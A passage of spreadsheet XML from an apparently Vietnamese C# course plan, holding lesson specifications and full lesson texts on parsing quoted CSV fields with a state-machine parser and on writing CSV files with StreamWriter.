      </c>
      <c r="B48" s="10" t="inlineStr">
        <is>
          <t>5. Làm việc với Dữ liệu có Cấu trúc (CSV)</t>
        </is>
      </c>
      <c r="C48" s="10" t="inlineStr">
        <is>
          <t>Đọc dữ liệu từ File CSV</t>
        </is>
      </c>
      <c r="D48" s="10" t="inlineStr">
        <is>
          <t>Xử lý các trường có dấu nháy kép và dấu phân cách đặc biệt</t>
        </is>
      </c>
      <c r="E48" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
      <c r="F48" s="11" t="inlineStr">
        <is>
          <t>Nên làm</t>
        </is>
      </c>
      <c r="G48" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H48" s="10" t="inlineStr">
        <is>
          <t>Thấy vì sao Split(',') sai với trường chứa dấu phẩy, và bộ phân tích theo trạng thái xử lý đúng ra sao.</t>
        </is>
      </c>
      <c r="I48" s="10" t="inlineStr">
        <is>
          <t>2 cột song song: Split(',') | Bộ phân tích theo trạng thái</t>
        </is>
      </c>
      <c r="J48" s="10" t="inlineStr">
        <is>
          <t>Trái: dòng bị cắt ở mọi dấu phẩy → 4 ô, ô thừa tô đỏ. Phải: con trỏ chạy trên từng ký tự; huy hiệu 'Trong nháy: Có/Không'; dấu phẩy trong nháy tô xám 'không cắt'; trường hoàn tất được thả vào ô kết quả.</t>
        </is>
      </c>
      <c r="K48" s="10" t="inlineStr">
        <is>
          <t>H18, H17</t>
        </is>
      </c>
      <c r="L48" s="10" t="inlineStr">
        <is>
          <t>Dấu phẩy trong trường | Nháy kép trong trường</t>
        </is>
      </c>
      <c r="M48" s="10" t="inlineStr">
        <is>
          <t>Tab 1, dòng SP04,"Bút, mực xanh",15000.
Trái: Split → ["SP04", "\"Bút", " mực xanh\"", "15000"] → 4 trường, sai.
Phải (mỗi bước là một sự kiện): gặp dấu phẩy ngoài nháy → chốt "SP04"; gặp nháy mở → Trong nháy: Có; gặp dấu phẩy trong nháy → giữ lại; gặp nháy đóng → Trong nháy: Không; gặp dấu phẩy → chốt "Bút, mực xanh"; hết dòng → chốt "15000".
Tab 2, dòng SP05,"Sách ""C#"" cơ bản",90000: hai nháy liền nhau trong trường được hiểu là một ký tự nháy → Sách "C#" cơ bản.
Xong: 3 trường đúng.</t>
        </is>
      </c>
      <c r="N48" s="10" t="inlineStr">
        <is>
          <t>SP04,"Bút, mực xanh",15000 và SP05,"Sách ""C#"" cơ bản",90000</t>
        </is>
      </c>
      <c r="O48" s="10" t="inlineStr">
        <is>
          <t>Trường chứa dấu phẩy, nháy kép hoặc xuống dòng được bọc trong nháy kép; nháy bên trong viết thành "" (theo RFC 4180).</t>
        </is>
      </c>
      <c r="P48" s="10" t="inlineStr">
        <is>
          <t>Mô phỏng nhóm các ký tự thường thành một bước để không quá dài; chỉ dừng ở ký tự đặc biệt (nháy, dấu phẩy).</t>
        </is>
      </c>
      <c r="Q48" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/lam-viec-voi-du-lieu-co-cau-truc-csv/doc-du-lieu-tu-file-csv/xu-ly-cac-truong-co-dau-nhay-kep-va-dau-phan-cach-dac-biet/index.html</t>
        </is>
      </c>
      <c r="R48" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/lam-viec-voi-du-lieu-co-cau-truc-csv/doc-du-lieu-tu-file-csv/xu-ly-cac-truong-co-dau-nhay-kep-va-dau-phan-cach-dac-biet/</t>
        </is>
      </c>
      <c r="S48" s="10" t="n"/>
      <c r="T48" s="12" t="n"/>
      <c r="U48" s="12" t="n"/>
      <c r="V48" s="21" t="inlineStr">
        <is>
          <t>Tại sao cần dấu nháy kép trong CSV?
Trong bài học trước, bạn đã tìm hiểu cách đọc các file CSV cơ bản, nơi mỗi trường dữ liệu được phân tách bằng dấu phẩy và không chứa các ký tự đặc biệt. Tuy nhiên, trong thực tế, dữ liệu thường phức tạp hơn nhiều.
Hãy tưởng tượng bạn có một trường dữ liệu mô tả sản phẩm "Áo thun, size L". Nếu bạn lưu trường này trực tiếp vào CSV mà không có biện pháp đặc biệt, dấu phẩy trong "Áo thun, size L" sẽ bị hiểu nhầm là dấu phân cách giữa các trường, làm hỏng cấu trúc dữ liệu của bạn.
Đó là lý do tại sao định dạng CSV có một quy tắc đặc biệt: sử dụng dấu nháy kép (") để bao quanh các trường chứa các ký tự đặc biệt. Các ký tự đặc biệt này bao gồm:
Dấu phẩy (,): Ký tự phân cách trường mặc định.
Dấu nháy kép ("): Ký tự dùng để bao quanh trường.
Ký tự xuống dòng (newline): Cho phép một trường dữ liệu kéo dài qua nhiều dòng trong file CSV.
Khi một trường được bao quanh bởi dấu nháy kép, bất kỳ dấu phẩy hoặc ký tự xuống dòng nào bên trong cặp dấu nháy kép đó sẽ được coi là một phần của dữ liệu, chứ không phải là dấu phân cách.
Ví dụ:
Giả sử bạn có dữ liệu sau:
Tên sản phẩm: Bàn làm việc
Mô tả: Bàn gỗ sồi, màu nâu. Rất bền.
Giá: 1.500.000
Nếu không có dấu nháy kép, dòng CSV có thể trông như thế này:
Bàn làm việc,Bàn gỗ sồi, màu nâu. Rất bền.,1.500.000
Ở đây, Bàn gỗ sồi, màu nâu. Rất bền. sẽ bị phân tách thành hai trường bởi dấu phẩy thứ hai.
Để xử lý đúng, bạn cần dùng dấu nháy kép:
Bàn làm việc,"Bàn gỗ sồi, màu nâu. Rất bền.",1.500.000
Lúc này, toàn bộ chuỗi "Bàn gỗ sồi, màu nâu. Rất bền." sẽ được hiểu là một trường duy nhất.
Quy tắc vàng khi làm việc với dấu nháy kép
Để đọc và xử lý đúng đắn các trường có dấu nháy kép, bạn cần nắm vững hai quy tắc chính:
Dấu nháy kép bao quanh trường
Quy tắc: Nếu một trường chứa dấu phẩy, dấu nháy kép hoặc ký tự xuống dòng, toàn bộ trường đó phải được bao quanh bởi một cặp dấu nháy kép.
Khi phân tích: Khi bạn đọc một trường, nếu nó bắt đầu và kết thúc bằng dấu nháy kép, bạn cần loại bỏ cặp dấu nháy kép bao quanh này để có được giá trị thực của trường.
Ví dụ CSV:
ID,Mô tả,Trạng thái
1,"Sản phẩm A, chất lượng cao",Còn hàng
2,"Sản phẩm B có ""giảm giá"" đặc biệt",Hết hàng
3,"Sản phẩm C
(mới về)",Còn hàng
Trong ví dụ trên:
Trường Mô tả của ID=1 là "Sản phẩm A, chất lượng cao". Khi phân tích, bạn sẽ loại bỏ dấu nháy kép ngoài cùng để được Sản phẩm A, chất lượng cao.
Trường Mô tả của ID=3 là "Sản phẩm C\n(mới về)" (giả sử \n là ký tự xuống dòng). Sau khi loại bỏ dấu nháy kép, giá trị là Sản phẩm C\n(mới về).
Dấu nháy kép bên trong trường
Quy tắc: Nếu bản thân giá trị của một trường chứa một dấu nháy kép, thì dấu nháy kép đó phải được thoát (escaped) bằng cách lặp lại nó hai lần ("").
Khi phân tích: Sau khi đã loại bỏ cặp dấu nháy kép bao quanh (nếu có), bạn cần thay thế tất cả các chuỗi "" (hai dấu nháy kép liền nhau) thành một dấu nháy kép (") duy nhất.
Ví dụ CSV:
Tên sản phẩm,Chi tiết
Laptop,"Mẫu mới nhất, được đánh giá ""Tuyệt vời"" bởi khách hàng."
Điện thoại,"Phiên bản ""Pro Max"", giá tốt nhất."
Trong ví dụ trên:
Trường Chi tiết của Laptop là "Mẫu mới nhất, được đánh giá ""Tuyệt vời"" bởi khách hàng.".
Loại bỏ dấu nháy kép bao quanh: Mẫu mới nhất, được đánh giá ""Tuyệt vời"" bởi khách hàng.
Thay thế "" thành ": Mẫu mới nhất, được đánh giá "Tuyệt vời" bởi khách hàng.
Trường Chi tiết của Điện thoại là "Phiên bản ""Pro Max"", giá tốt nhất.".
Loại bỏ dấu nháy kép bao quanh: Phiên bản ""Pro Max"", giá tốt nhất.
Thay thế "" thành ": Phiên bản "Pro Max", giá tốt nhất.
Thực hiện phân tích các trường phức tạp trong C#
Như bạn đã biết từ bài "Các bước cơ bản để đọc File CSV trong C#", StreamReader giúp chúng ta đọc từng dòng dữ liệu. Tuy nhiên, việc phân tích các dòng này thành từng trường dữ liệu khi có dấu nháy kép đòi hỏi kỹ thuật cao hơn.
Thách thức với phương pháp string.Split() đơn giản
Phương thức string.Split(',') mà bạn có thể đã nghĩ đến sẽ không hoạt động chính xác với các trường có dấu nháy kép. Nó sẽ phân tách ngay cả những dấu phẩy nằm bên trong một trường được bao quanh bởi dấu nháy kép.
Ví dụ:
string line = "Bàn làm việc,\"Bàn gỗ sồi, màu nâu. Rất bền.\",1.500.000";
string[] fields = line.Split(',');
foreach (string field in fields)
{
    Console.WriteLine(field);
}
Kết quả sẽ là:
Bàn làm việc
"Bàn gỗ sồi
màu nâu. Rất bền."
1.500.000
Rõ ràng, Bàn gỗ sồi và màu nâu. Rất bền. đã bị tách thành hai trường riêng biệt, không đúng với ý định ban đầu.
Xử lý dấu nháy kép sau khi trích xuất trường
Giả sử bạn đã có cách nào đó để trích xuất một trường (ví dụ: "Bàn gỗ sồi, màu nâu. Rất bền."" hoặc ""Tuyệt vời""`), bạn cần một hàm để "làm sạch" nó theo các quy tắc đã học.
public static string CleanCsvField(string field)
{
    // Kiểm tra xem trường có được bao quanh bởi dấu nháy kép không
    if (field.Length &gt;= 2 &amp;&amp; field.StartsWith("\"") &amp;&amp; field.EndsWith("\""))
    {
        // Loại bỏ dấu nháy kép bao quanh
        string innerValue = field.Substring(1, field.Length - 2);
        // Thay thế dấu nháy kép kép ("") thành một dấu nháy kép duy nhất (")
        return innerValue.Replace("\"\"", "\"");
    }
    // Nếu không có dấu nháy kép bao quanh, trả về nguyên bản
    return field;
}
Bạn có thể sử dụng hàm này sau khi đã trích xuất từng trường từ dòng CSV. Vấn đề còn lại là làm sao để trích xuất các trường một cách chính xác.
Kỹ thuật phân tích dòng CSV nâng cao (Minh họa)
Để phân tích một dòng CSV phức tạp, chúng ta cần một logic tinh vi hơn, thường dựa trên ý tưởng về "máy trạng thái" (state machine) đơn giản, nơi chúng ta theo dõi xem mình đang ở trong hay ngoài một trường được bao quanh bởi dấu nháy kép.
Dưới đây là một minh họa về cách tiếp cận thủ công để phân tách một dòng CSV, tuy nhiên, trong thực tế, bạn nên xem xét các thư viện chuyên dụng để đảm bảo độ tin cậy và hiệu suất.
using System.Collections.Generic;
using System.Text;
public static List&lt;string&gt; ParseCsvLine(string line)
{
    List&lt;string&gt; fields = new List&lt;string&gt;();
    StringBuilder currentField = new StringBuilder();
    bool inQuote = false; // Theo dõi xem chúng ta đang ở trong một trường được bao quanh bởi dấu nháy kép hay không
    for (int i = 0; i &lt; line.Length; i++)
    {
        char c = line[i];
        if (c == '"')
        {
            // Nếu là dấu nháy kép:
            if (inQuote)
            {
                // Nếu đang ở trong dấu nháy kép, kiểm tra xem có phải là dấu nháy kép kép ("") không
                if (i + 1 &lt; line.Length &amp;&amp; line[i + 1] == '"')
                {
                    // Đây là dấu nháy kép thoát (""), thêm một dấu nháy kép vào trường hiện tại
                    currentField.Append('"');
                    i++; // Bỏ qua ký tự nháy kép thứ hai
                }
                else
                {
                    // Đây là dấu nháy kép kết thúc trường
                    inQuote = false;
                }
            }
            else
            {
                // Đây là dấu nháy kép bắt đầu trường
                inQuote = true;
            }
        }
        else if (c == ',' &amp;&amp; !inQuote)
        {
            // Nếu là dấu phẩy và không ở trong dấu nháy kép, đây là dấu phân cách
            fields.Add(currentField.ToString());
            currentField.Clear();
        }
        else
        {
            // Các ký tự khác, thêm vào trường hiện tại
            currentField.Append(c);
        }
    }
    // Thêm trường cuối cùng sau khi vòng lặp kết thúc
    fields.Add(currentField.ToString());
    return fields;
}
Với hàm ParseCsvLine, bạn sẽ nhận được một List&lt;string&gt; chứa các trường thô (ví dụ: "Bàn gỗ sồi, màu nâu. Rất bền."" hoặc "Sản phẩm B có ""giảm giá"" đặc biệt"). Sau đó, bạn có thể áp dụng hàm CleanCsvField` cho từng trường để có được giá trị cuối cùng.
Khi nào nên dùng Biểu thức chính quy (Regex)?
Biểu thức chính quy (Regex) là một công cụ mạnh mẽ để tìm kiếm và trích xuất các mẫu chuỗi phức tạp. Bạn có thể sử dụng Regex để cố gắng phân tách các trường CSV. Một mẫu Regex để xử lý các trường có dấu nháy kép có thể trở nên khá phức tạp.
Ví dụ, một mẫu Regex đơn giản để trích xuất các trường (bao gồm cả các trường được bao quanh bởi dấu nháy kép và có dấu phẩy bên trong) có thể trông như thế này:
,(?=(?:[^"]*"[^"]*")*[^"]*$)
Mẫu này không phải để trích xuất trường mà là để tách chuỗi dựa trên dấu phẩy không nằm trong dấu nháy kép. Sau khi tách bằng Regex này, bạn vẫn cần áp dụng logic CleanCsvField cho từng phần tử.
Việc viết Regex để xử lý tất cả các trường hợp của CSV (bao gồm cả dấu nháy kép kép và ký tự xuống dòng bên trong trường) là một thách thức lớn và thường dẫn đến các biểu thức rất khó đọc, khó bảo trì. Đối với các tác vụ phân tích CSV, việc tự viết Regex hoàn chỉnh thường không được khuyến khích trừ khi bạn có yêu cầu rất cụ thể và đơn giản.
Lời khuyên: Sử dụng thư viện chuyên dụng
Như bạn thấy, việc tự viết mã để xử lý tất cả các trường hợp phức tạp của định dạng CSV (dấu nháy kép, dấu nháy kép kép, ký tự xuống dòng, các loại dấu phân cách khác, v.v.) là một công việc tốn thời gian và dễ mắc lỗi.
Trong các ứng dụng thực tế, cách tiếp cận tốt nhất là sử dụng một thư viện phân tích CSV đã được kiểm chứng và tối ưu hóa. Các thư viện này đã xử lý tất cả các trường hợp phức tạp này cho bạn, giúp mã của bạn sạch sẽ hơn, đáng tin cậy hơn và dễ bảo trì hơn.
Một số thư viện phổ biến trong C# bao gồm:
CsvHelper: Một thư viện mạnh mẽ và linh hoạt, dễ sử dụng cho cả việc đọc và ghi CSV.
Microsoft.VisualBasic.FileIO.TextFieldParser: Một lớp có sẵn trong .NET (thuộc namespace Microsoft.VisualBasic.FileIO) được thiết kế đặc biệt để phân tích các file văn bản có cấu trúc như CSV. Nó cung cấp các tùy chọn để chỉ định dấu phân cách, xử lý dấu nháy kép và bỏ qua các dòng trống.
Trong các bài học tiếp theo, chúng ta sẽ khám phá cách sử dụng các thư viện này để đơn giản hóa quá trình làm việc với dữ liệu CSV.</t>
        </is>
      </c>
      <c r="W48" s="22" t="inlineStr">
        <is>
          <t># Xử lý các trường có dấu nháy kép và dấu phân cách đặc biệt
## Mục tiêu học tập
Sau bài học này, bạn có thể:
- Giải thích vì sao một trường CSV chứa dấu phẩy, nháy kép hoặc xuống dòng phải được bao trong nháy kép.
- Phân biệt hai quy tắc: nháy bao quanh trường và nháy đôi `""` biểu diễn một dấu nháy bên trong trường.
- Nhận ra vì sao `Split(',')` đọc sai các trường này.
- Viết bộ phân tích dòng CSV đi từng ký tự và nhớ trạng thái "đang trong nháy".
- Quan sát cách `Split(',')` và bộ phân tích theo trạng thái xử lý cùng một dòng bằng hoạt động mô phỏng.
## Vì sao CSV cần dấu nháy kép?
Ở các bài trước, mỗi trường được phân tách bằng dấu phẩy và không chứa ký tự đặc biệt. Dữ liệu thực tế phức tạp hơn. Giả sử tên sản phẩm là `Bút, mực xanh`. Nếu ghi thẳng vào CSV, dấu phẩy trong tên sẽ bị hiểu nhầm là dấu phân cách giữa hai trường, và cấu trúc dòng bị hỏng.
CSV giải quyết bằng một quy tắc: trường nào chứa **dấu phẩy** (`,`), **dấu nháy kép** (`"`) hoặc **ký tự xuống dòng** thì phải được bao trong một cặp dấu nháy kép. Bên trong cặp nháy này, dấu phẩy và xuống dòng chỉ là dữ liệu bình thường, không còn là dấu phân cách.
```
SP04,"Bút, mực xanh",15000
```
Dòng trên có đúng **3 trường**: `SP04`, `Bút, mực xanh` và `15000`.
## Hai quy tắc khi đọc trường
### Nháy kép bao quanh trường
Khi đọc, nháy bao quanh chỉ là dấu hiệu "trường này bắt đầu và kết thúc ở đây". Nó **không** thuộc giá trị, nên phải bỏ đi.
Ví dụ, trường `"Sản phẩm A, chất lượng cao"` có giá trị thật là `Sản phẩm A, chất lượng cao`.
### Nháy kép nằm bên trong trường
Nếu giá trị thật có chứa một dấu nháy kép, CSV viết nó thành **hai dấu nháy liền nhau** (`""`). Khi đọc, ta đổi `""` về một dấu `"`.
```
SP05,"Sách ""C#"" cơ bản",90000
```
Trường giữa được đọc như sau:
1. Bỏ cặp nháy bao quanh: `Sách ""C#"" cơ bản`.
2. Đổi mỗi `""` thành `"`: `Sách "C#" cơ bản`.
## Vì sao `Split(',')` không đủ?
`string.Split(',')` chỉ nhìn thấy ký tự dấu phẩy. Nó không biết dấu phẩy nào nằm trong nháy, nên cắt ở **mọi** dấu phẩy.
```csharp
using System;
public class Program
{
    public static void Main()
    {
        string line = "SP04,\"Bút, mực xanh\",15000";
        string[] parts = line.Split(',');
        Console.WriteLine(parts.Length);   // 4 (đáng lẽ là 3)
        foreach (string p in parts)
        {
            Console.WriteLine(p);
        }
        // SP04
        // "Bút
        //  mực xanh"
        // 15000
    }
}
```
Trường `Bút, mực xanh` bị vỡ thành hai mảnh. Với dòng `SP05,"Sách ""C#"" cơ bản",90000`, `Split` vẫn cho 3 phần, nhưng phần giữa còn nguyên nháy bao quanh và nháy đôi, tức là chưa phải giá trị đúng.
## Bộ phân tích theo trạng thái
Cách đúng là đi qua từng ký tự và nhớ một thông tin: **đang ở trong nháy hay không**. Ta cần ba thứ:
- `fields`: danh sách các trường đã xong.
- `cur`: trường đang ghép dở (`StringBuilder`).
- `inQuote`: cờ `bool` cho biết đang trong nháy hay không, ban đầu là `false`.
Với mỗi ký tự `ch`:
| Gặp | Điều kiện | Việc làm |
|---|---|---|
| `"` | đang trong nháy, ký tự sau cũng là `"` | thêm một dấu `"` vào `cur`, nhảy qua ký tự sau |
| `"` | trường hợp còn lại | đảo cờ `inQuote` (nháy mở hoặc nháy đóng), không thêm gì vào `cur` |
| `,` | `inQuote` là `false` | chốt trường: thêm `cur` vào `fields`, xóa `cur` |
| `,` | `inQuote` là `true` | dấu phẩy là dữ liệu, thêm vào `cur` |
| ký tự khác | | thêm vào `cur` |
Hết dòng thì chốt nốt trường cuối cùng.
```csharp
using System;
using System.Collections.Generic;
using System.Text;
public class Program
{
    public static List&lt;string&gt; ParseCsvLine(string line)
    {
        var fields = new List&lt;string&gt;();
        var cur = new StringBuilder();
        bool inQuote = false;
        for (int i = 0; i &lt; line.Length; i++)
        {
            char ch = line[i];
            if (ch == '"')
            {
                if (inQuote &amp;&amp; i + 1 &lt; line.Length &amp;&amp; line[i + 1] == '"')
                {
                    cur.Append('"');   // hai nháy liền nhau = một dấu nháy
                    i++;
                }
                else
                {
                    inQuote = !inQuote;   // nháy mở hoặc nháy đóng
                }
            }
            else if (ch == ',' &amp;&amp; !inQuote)
            {
                fields.Add(cur.ToString());   // dấu phẩy ngoài nháy: chốt trường
                cur.Clear();
            }
            else
            {
                cur.Append(ch);
            }
        }
        fields.Add(cur.ToString());   // trường cuối cùng
        return fields;
    }
    public static void Main()
    {
        var a = ParseCsvLine("SP04,\"Bút, mực xanh\",15000");
        Console.WriteLine(a.Count);   // 3
        Console.WriteLine(a[1]);      // Bút, mực xanh
        var b = ParseCsvLine("SP05,\"Sách \"\"C#\"\" cơ bản\",90000");
        Console.WriteLine(b[1]);      // Sách "C#" cơ bản
    }
}
```
Hàm này vừa bỏ nháy bao quanh vừa đổi `""` về `"` ngay trong lúc đi, nên không cần bước làm sạch riêng sau đó.
## Hoạt động: Split và bộ phân tích theo trạng thái
Mô phỏng dưới đây chạy cùng một dòng CSV ở hai cột: cột trái dùng `Split(',')`, cột phải dùng bộ phân tích theo trạng thái. Hãy thao tác theo thứ tự sau, bấm **Bước tiếp** để chạy từng dòng:
- Mở tab **Dấu phẩy trong trường**. Dòng đọc là `SP04,"Bút, mực xanh",15000`. Ở cột trái, `Split(',')` cắt ở mọi dấu phẩy nên cho `parts.Length` bằng 4 thay vì 3; các mảnh bị sai được tô đỏ và thẻ lỗi báo "Sai: 4 trường". Ở cột phải, bạn thấy cờ "Trong nháy" chuyển từ Không sang Có khi gặp nháy mở. Dấu phẩy sau chữ "Bút" được giữ lại trong `cur` vì đang trong nháy. Hết dòng, kết quả là 3 trường đúng: `SP04`, `Bút, mực xanh`, `15000`; ô mới chốt có màu xanh.
- Mở tab **Nháy kép trong trường**. Dòng đọc là `SP05,"Sách ""C#"" cơ bản",90000`. Ở cột trái, `Split` vẫn cho 3 phần nhưng phần giữa còn nguyên nháy bao quanh và nháy đôi, nên bị tô đỏ với thẻ "Giá trị sai". Ở cột phải, mỗi cặp `""` được xử lý trong một bước: thêm một dấu `"` vào `cur` rồi nhảy qua dấu thứ hai. Kết quả cuối có 3 trường đúng, trường giữa là `Sách "C#" cơ bản`.
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/lam-viec-voi-du-lieu-co-cau-truc-csv/doc-du-lieu-tu-file-csv/xu-ly-cac-truong-co-dau-nhay-kep-va-dau-phan-cach-dac-biet/" title="Trường có nháy kép và dấu phẩy" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: `Split(',')` chỉ hợp với dữ liệu đơn giản vì nó không hiểu nháy kép. Muốn đọc đúng, cần một bộ phân tích đi từng ký tự và nhớ trạng thái "đang trong nháy".
## Còn Regex và thư viện thì sao?
Bạn có thể dùng biểu thức chính quy (Regex) để tách dấu phẩy nằm ngoài nháy, nhưng mẫu sẽ rất khó đọc và khó bảo trì, nhất là khi trường có `""` hoặc xuống dòng. Vì vậy, không nên tự viết Regex cho việc này.
Hàm `ParseCsvLine` ở trên đủ để hiểu bản chất, nhưng nó chỉ xử lý từng **dòng**. Một trường có xuống dòng bên trong nháy trải dài qua nhiều dòng trong tệp, nên cần đọc cả tệp chứ không chỉ từng dòng. Trong ứng dụng thực tế, hãy dùng thư viện đã được kiểm chứng như **CsvHelper** (gói NuGet) hoặc lớp `TextFieldParser` trong `Microsoft.VisualBasic.FileIO`.
## Tóm tắt
- Trường chứa dấu phẩy, nháy kép hoặc xuống dòng phải được bao trong cặp nháy kép.
- Khi đọc: bỏ nháy bao quanh, và đổi mỗi `""` thành một `"`.
- `Split(',')` cắt ở mọi dấu phẩy nên đọc sai các trường có dấu phẩy trong nháy.
- Bộ phân tích theo trạng thái dùng cờ `inQuote` để biết dấu phẩy nào là dấu phân cách, dấu phẩy nào là dữ liệu.
- Với dữ liệu thật, nên dùng thư viện CSV thay vì tự viết Regex.</t>
        </is>
      </c>
    </row>
    <row r="49" ht="409.6" customHeight="1" s="18">
      <c r="A49" s="10" t="n">
        <v>49</v>
      </c>
      <c r="B49" s="10" t="inlineStr">
        <is>
          <t>5. Làm việc với Dữ liệu có Cấu trúc (CSV)</t>
        </is>
      </c>
      <c r="C49" s="10" t="inlineStr">
        <is>
          <t>Ghi dữ liệu ra File CSV</t>
        </is>
      </c>
      <c r="D49" s="10" t="inlineStr">
        <is>
          <t>Các bước cơ bản để ghi File CSV trong C#</t>
        </is>
      </c>
      <c r="E49" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
      <c r="F49" s="11" t="inlineStr">
        <is>
          <t>Nên làm</t>
        </is>
      </c>
      <c r="G49" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H49" s="10" t="inlineStr">
        <is>
          <t>Thấy chiều ngược lại: đối tượng → dòng văn bản → tệp.</t>
        </is>
      </c>
      <c r="I49" s="10" t="inlineStr">
        <is>
          <t>1 cột</t>
        </is>
      </c>
      <c r="J49" s="10" t="inlineStr">
        <is>
          <t>Dây chuyền ngược: thẻ Product → mảng giá trị → string.Join(",") → dòng → trình xem tệp đầy dần. Dòng tiêu đề được ghi đầu tiên.</t>
        </is>
      </c>
      <c r="K49" s="10" t="inlineStr">
        <is>
          <t>H17, H12</t>
        </is>
      </c>
      <c r="L49" s="10" t="inlineStr">
        <is>
          <t>1 tab</t>
        </is>
      </c>
      <c r="M49" s="10" t="inlineStr">
        <is>
          <t>Mở StreamWriter trong using.
WriteLine("Ma,Ten,Gia") → dòng tiêu đề.
Product 1 → ["SP01", "Bút bi", "5000"] → Join → "SP01,Bút bi,5000" → ghi.
Lặp với 2 sản phẩm còn lại.
Rời using → tệp được đóng và có 4 dòng. Xong.</t>
        </is>
      </c>
      <c r="N49" s="10" t="inlineStr">
        <is>
          <t>3 Product</t>
        </is>
      </c>
      <c r="O49" s="10" t="inlineStr">
        <is>
          <t>Ghi CSV = ghi tiêu đề → với mỗi đối tượng: lấy giá trị → nối bằng dấu phẩy → ghi dòng.</t>
        </is>
      </c>
      <c r="P49" s="10" t="inlineStr">
        <is>
          <t>Số thập phân nên định dạng bằng CultureInfo.InvariantCulture để 12.5 không thành "12,5" (làm lệch cột) trên máy cài tiếng Việt.</t>
        </is>
      </c>
      <c r="Q49" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/lam-viec-voi-du-lieu-co-cau-truc-csv/ghi-du-lieu-ra-file-csv/cac-buoc-co-ban-de-ghi-file-csv-trong-c-sharp/index.html</t>
        </is>
      </c>
      <c r="R49" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/lam-viec-voi-du-lieu-co-cau-truc-csv/ghi-du-lieu-ra-file-csv/cac-buoc-co-ban-de-ghi-file-csv-trong-c-sharp/</t>
        </is>
      </c>
      <c r="S49" s="10" t="n"/>
      <c r="T49" s="12" t="n"/>
      <c r="U49" s="12" t="n"/>
      <c r="V49" s="21" t="inlineStr">
        <is>
          <t>Giới thiệu về StreamWriter trong C#
Trong lập trình C#, khi cần ghi dữ liệu văn bản ra một file, lớp StreamWriter là công cụ mạnh mẽ và phổ biến. Nó cung cấp một cách hiệu quả để ghi các chuỗi ký tự vào một luồng (stream), mà trong trường hợp này là một file trên hệ thống. StreamWriter xử lý các chi tiết cấp thấp về mã hóa ký tự và ghi dữ liệu, cho phép bạn tập trung vào nội dung cần ghi.
Để sử dụng StreamWriter, bạn cần tạo một thể hiện của nó, thường là bằng cách cung cấp đường dẫn đến file mà bạn muốn ghi. Điều quan trọng là phải đảm bảo rằng StreamWriter được đóng đúng cách sau khi sử dụng để giải phóng tài nguyên hệ thống và đảm bảo tất cả dữ liệu đã được ghi xuống đĩa. Cách tốt nhất để làm điều này là sử dụng khối lệnh using, nó sẽ tự động gọi phương thức Dispose() (và do đó Close()) cho bạn khi kết thúc khối.
Dưới đây là một ví dụ cơ bản về cách tạo và ghi một file văn bản đơn giản:
using System;
using System.IO; // Quan trọng: cần namespace này
public class FileWriter
{
    public static void Main(string[] args)
    {
        string filePath = "mydata.txt"; // Tên file sẽ được tạo hoặc ghi
        // Sử dụng 'using' để đảm bảo StreamWriter được đóng đúng cách
        using (StreamWriter writer = new StreamWriter(filePath))
        {
            writer.WriteLine("Đây là dòng đầu tiên.");
            writer.WriteLine("Đây là dòng thứ hai.");
            Console.WriteLine($"Đã ghi dữ liệu vào file: {filePath}");
        }
    }
}
Trong ví dụ trên, chúng ta đã tạo một file có tên mydata.txt và ghi hai dòng văn bản vào đó. Nếu file mydata.txt chưa tồn tại, nó sẽ được tạo mới. Nếu nó đã tồn tại, nội dung cũ sẽ bị ghi đè (chúng ta sẽ thảo luận chi tiết hơn về các chế độ ghi file ở phần sau).
Ghi từng dòng dữ liệu với phương thức WriteLine()
Khi ghi dữ liệu CSV, chúng ta thường làm việc với từng dòng (record) một. Mỗi dòng trong file CSV đại diện cho một bản ghi dữ liệu, và các trường (field) trong bản ghi đó được phân tách bằng dấu phân cách (thường là dấu phẩy). Phương thức WriteLine() của StreamWriter là lý tưởng cho nhiệm vụ này.
WriteLine() nhận vào một chuỗi (string) làm đối số và ghi chuỗi đó vào file, sau đó tự động thêm một ký tự xuống dòng (newline character) ở cuối. Điều này đảm bảo rằng mỗi lần bạn gọi WriteLine(), nội dung tiếp theo sẽ bắt đầu trên một dòng mới, đúng như định dạng của một file CSV.
Để ghi một dòng dữ liệu CSV, bạn cần:
Tạo một chuỗi đại diện cho một dòng CSV. Điều này thường bao gồm việc nối các giá trị của các trường lại với nhau, phân tách chúng bằng dấu phẩy (hoặc dấu phân cách khác mà bạn chọn).
Đảm bảo rằng các quy tắc định dạng CSV phức tạp hơn (như xử lý dấu nháy kép cho các trường chứa dấu phẩy, dấu nháy kép hoặc ký tự xuống dòng) đã được áp dụng cho từng trường trước khi nối chúng lại. Bạn có thể tìm hiểu chi tiết về các quy tắc này trong bài đọc "Quy tắc xử lý dấu nháy kép khi ghi CSV".
Hãy xem xét ví dụ sau, nơi chúng ta ghi một dòng tiêu đề và một dòng dữ liệu vào file CSV:
using System;
using System.IO;
public class CsvWriterBasic
{
    public static void Main(string[] args)
    {
        string filePath = "products.csv";
        using (StreamWriter writer = new StreamWriter(filePath))
        {
            // Ghi dòng tiêu đề
            string headerLine = "ID,Tên sản phẩm,Giá,Số lượng";
            writer.WriteLine(headerLine);
            // Ghi một dòng dữ liệu
            string product1Line = "101,Laptop ABC,1200.50,15";
            writer.WriteLine(product1Line);
            // Ghi một dòng dữ liệu khác (ví dụ có dấu phẩy trong tên sản phẩm,
            // nhưng ở đây ta giả định đã xử lý quoting trước khi tạo chuỗi)
            string product2Line = "102,\"Chuột không dây, Bluetooth\",25.99,50";
            writer.WriteLine(product2Line);
            Console.WriteLine($"Đã ghi dữ liệu CSV vào file: {filePath}");
        }
    }
}
